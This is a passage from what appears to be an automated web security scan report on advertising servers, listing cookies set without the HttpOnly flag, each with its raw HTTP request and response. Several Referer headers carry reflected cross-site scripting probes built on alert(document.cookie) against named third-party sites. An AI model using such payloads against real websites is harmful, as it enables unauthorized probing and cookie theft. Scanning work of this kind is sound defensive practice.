GET /PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CDJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=D5990400-1924-8254-0209-118000C40100; PRca=|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 6312
Set-Cookie:PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

if(!window.prRefs){window.prRefs={}}window.prRefs['AC931A6999-1254-44BB-9596-52F9E99E7F03']='%3C%3Fxml version%3D%221%2E0%22 standalone%3D%22yes%22%3F%3E%3Cprdata%3E%3Cviewcount%3E%3C%21%5BCDATA%5BAH0
...[SNIP]...

14.200. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • rsi_us_1000000=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; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?activate&csid=K04491 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=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; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:06:44 GMT
Content-Length: 822

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.201. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com
  • NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1? HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 475
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f41
...[SNIP]...

14.202. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1? HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.1.10.1295884751; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 489
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1129050465/Right1/TOLMedia/House-TOL-Sky/pwctol-120x600-new.jpg/72634857383030396
...[SNIP]...

14.203. http://adserver.adtechus.com/bind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /bind

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • autotrdr_exclude=autotrdr_exclude;expires=Thu, 24 Feb 2011 2:19:49 GMT;domain=adserver.adtechus.com;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=autotrdr_exclude;cvalue1=autotrdr_exclude;expiresDays=30;adct=text/html;misc=123 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=9811137525830.418?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: autotrdr_exclude=autotrdr_exclude;expires=Thu, 24 Feb 2011 2:19:49 GMT;domain=adserver.adtechus.com;path=/


14.204. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:19:47 GMT
Content-Length: 18077

<!DOCTYPE html>
<!-- Host: as2108 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...

14.205. http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1295921988188_58040565_as2108_imp/vew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • imp=a$le#1295921992907_58231589_as2103_vew|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:52 GMT; Path=/tase
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1295921988188_58040565_as2108_imp/vew?q=H4sIAAAAAAAAAFWPPW7DMAyFr0KKlCii2jl56BoYOkIB_wjp6CEpPDTJcXqoXqa0kRrtQOC9xw984Pf89bKO5QSUgw-QZEzd04kwCf26zJn4cJpV0kGmpDHlv075cJAZDhJUkVNvY0Fb5uKJEyESpETWxi3wHsiqTtrwsQUh7aGQ2NvQ1nIKXs0M2LnQQEC7AALtnwQEwuh3O9jWQrQLFIi9rdf_LZUVI7JwXUZntK6fg92G86UQAlSESrEC1pArqi_ae3m9T-22PK7WCvmrMYLkhMi2Ps5lmdu9Tcv1MtlQSNl-AMndVvZlAQAA&act=vew&idx=[0]&com=swf&rnd=1295921994463 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://pcdn.tcgmsrv.net/tase/swf/toyota-inmarket/toyota_inmarket_300.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295921992907_58231589_as2103_vew|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:52 GMT; Path=/tase
ETag: W/"43-1259995862000"
Last-Modified: Sat, 05 Dec 2009 06:51:02 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 02:19:52 GMT

GIF89a.............!.......,...........D..;

14.206. http://adserving.autotrader.com/js.ng/adsize=1x1&site=ntl&page=homepagegeosplash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserving.autotrader.com
Path:   /js.ng/adsize=1x1&site=ntl&page=homepagegeosplash

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServeradserving=596041738.42015.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/adsize=1x1&site=ntl&page=homepagegeosplash?v=3.17.167500 HTTP/1.1
Host: adserving.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=ae08625-18449-1404707754-12; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; ATC_USER_ZIP=

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:40 GMT
Server: Apache
AdServer: padsrv7002:9678:1
Cache-Control: max-age=0
Expires: Tue, 25 Jan 2011 02:19:40 GMT
Content-Length: 34
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServeradserving=596041738.42015.0000; path=/

document.write('\n<html></html>');

14.207. https://adwords.google.com/select/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • AdsUserLocale=en_US; Expires=Wed, 23-Feb-2011 15:01:47 GMT; Path=/; Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en_US; Expires=Wed, 23-Feb-2011 15:01:47 GMT; Path=/; Secure
Set-Cookie: adwordsReferralSource=sourceid=awo&subid=us-en-et-symh&clickid=; Expires=Sun, 24-Apr-2011 15:01:47 GMT; Path=/; Secure; HttpOnly
Set-Cookie: I=FvymuC0BAAA=.9QCH/JbBItRG1yn60m2UCA==.pkBCW7TbpeIa9TooG/zDig==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=MnC9rKHGAj-MXXNt189FAg:awfe-efe=MnC9rKHGAj-MXXNt189FAg; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=OxzFPu9nM34AJjjsCC43vQ; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en
Date: Mon, 24 Jan 2011 15:01:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin?sourceid=awo&amp;subid=us-en
...[SNIP]...

14.208. http://affiliate.kickapps.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliate.kickapps.com
Path:   /crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerapp_server_pool=1739565248.47135.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: affiliate.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"274-1295596907000"
Last-Modified: Fri, 21 Jan 2011 08:01:47 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 274
Date: Tue, 25 Jan 2011 02:23:03 GMT
Set-Cookie: BIGipServerapp_server_pool=1739565248.47135.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-
...[SNIP]...

14.209. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/r1-ads.ace.advertising.com?U=/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1&V=3-%2fmHdV%2fSxID49%2fY3rKxMK4v+7iK9zQp8Trq285f3hOfOA%2fRinTOf8SX2thSjDHleWAQBFwlhcryU%3d&I=17D7C736696B8AA&D=r1.ace.advertising.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-B80F4175F833E42619203875B6A13D4E1441FE75A7BB1C5368154550679EAB18-CC167F5656F9E658F14A37A7A688219EBE41C044BE8EA8E25C20763073A7C846

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=
Expires: Mon, 24 Jan 2011 21:08:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:08:39 GMT
Connection: close
Set-Cookie: 01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


14.210. http://as1.whdh.com/pan/adlog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.whdh.com
Path:   /pan/adlog.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • phpAds_blockAd[1418]=1295949266; expires=Tue, 25-Jan-2011 21:54:26 GMT; path=/
  • phpAds_geoInfo=%7C%7C%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7Cgeoip; expires=Mon, 24-Jan-2011 22:09:26 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pan/adlog.php?bannerid=1418&clientid=1050&zoneid=3&source=&block=43200&capping=0&cb=7ae9a84863205189b51a67916c7ad5c6 HTTP/1.1
Host: as1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpAds_geoInfo=%7C%7C%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7Cgeoip

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906066227275; path=/
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: phpAds_blockAd[1418]=1295949266; expires=Tue, 25-Jan-2011 21:54:26 GMT; path=/
